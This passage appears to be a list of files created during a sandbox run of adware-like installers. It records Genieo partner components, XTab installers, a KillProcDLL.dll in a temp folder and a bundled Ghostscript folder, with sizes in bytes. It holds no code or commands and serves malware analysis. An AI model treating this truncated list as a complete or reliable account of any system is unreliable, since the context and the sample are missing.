      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\text (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA78.tmp (25714 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)
      C:\Windows\SysWOW64\3280701.html (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\rebirth[1].htm (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BD.tmp (25714 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\fct.dll (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\KillProcDLL.dll (816 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\down[1] (748 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\http_403_webOC[1] (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\ErrorPageTemplate[1] (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\httpErrorPagesScripts[1] (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\errorPageStrings[1] (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\config[1].json (778 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\info_48[1] (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\bullet[1] (447 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\background_gradient[1] (453 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe (152612 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\XTab_4.0.2.1716[1].exe (263908 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\manifest[1].xml (25 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsdll32.dll (648640 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_ops.ps (3122 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpcx.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019064l.pfb (18530 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xbm (961 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059016l.pfb (28130 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showpage.ps (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059036l.pfb (27394 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dbt_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\Setup.exe (29868 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mgl_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ppath.ps (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfwrite.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pcharstr.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\addxchar.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_kanji.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmap.ps (2210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018015l.pfb (23234 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018012l.pfb (26066 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xbm (353 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lev2.ps (6242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf2dsc.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pv.sh (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l2img.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pfbtopfa.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022003l.pfb (22930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sym_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019003l.pfb (15714 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\impath.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wrfont.ps (2642 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s_m.xbm (615 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_rbld.ps (1106 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_main.ps (8594 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidcm.ps (2210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\winmaps.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xpm (633 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022023l.pfb (23586 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021003l.pfb (26706 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010015l.pfb (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_base.ps (4226 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\uninfo.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wan_e.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_trap.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052004l.pfb (32818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m_m.xbm (971 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019024l.pfb (17754 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\acctest.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_type1.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010013l.pfb (16346 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pfile.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\jispaper.ps (961 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xpm (993 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t_m.xbm (363 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\packfile.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_img.ps (3122 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devcs.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\rollconv.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_draw.ps (11330 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\landscap.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewps2a.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ42.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resmp.ps (3122 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sepr.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl5_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\cid2code.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052003l.pfb (32818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gslp.ps (2642 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\lines.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfn.ps (1106 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052023l.pfb (31554 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pf2afm.ps (1442 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ32.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\align.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019023l.pfb (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resst.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_frsd.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cff.ps (3650 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_agl.ps (5522 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.GS (1106 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\zeroline.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewgif.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl2_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_font.ps (11338 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ccfnt.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1ops.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stocht.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpbm.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markhint.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs2.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xpm (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ksb_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\prfont.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdf_e.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ps2ai.ps (3650 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgx_e.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceimg.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fform.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markpath.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_btokn.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps2.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018035l.pfb (24930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_res.ps (8594 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019044l.pfb (17754 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_stres.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021024l.pfb (22674 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dscp.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mex_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xpm (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_rdlin.ps (886 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.dir (4850 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\docie.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il1_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022004l.pfb (28914 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\level1.ps (117 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs3.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewmiff.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il2_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019004l.pfb (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l_m.xbm (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\z003034l.pfb (26706 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052024l.pfb (32698 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\image-qa.ps (17754 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\d050000l.pfb (11394 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059033l.pfb (28130 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021004l.pfb (25474 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsnup.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\decrypt.ps (369 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cspace.ps (5522 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2c.ps (2642 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010033l.pfb (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fapi.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_css_e.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.scale (4850 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OSF (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewcmyk.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xbm (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmdl.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\printafm.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceop.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\caption.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Info-macos.plist (483 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdfwr.ps (3122 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_init.ps (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\unprot.ps (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgo_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_indxd.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ttf.ps (11338 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gswin32c.exe (31554 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_icc.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\COPYING (2210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfopt.ps (9458 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mro_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl1_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidtt.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OS2 (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_std_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010035l.pfb (17754 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfm.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATB (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\xlatmap (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ll3.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.SGI (1106 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATM (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewjpeg.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\bdftops.ps (3650 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_statd.ps (1106 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ht_ccsto.ps (56210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_patrn.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\errpage.ps (578 bytes)
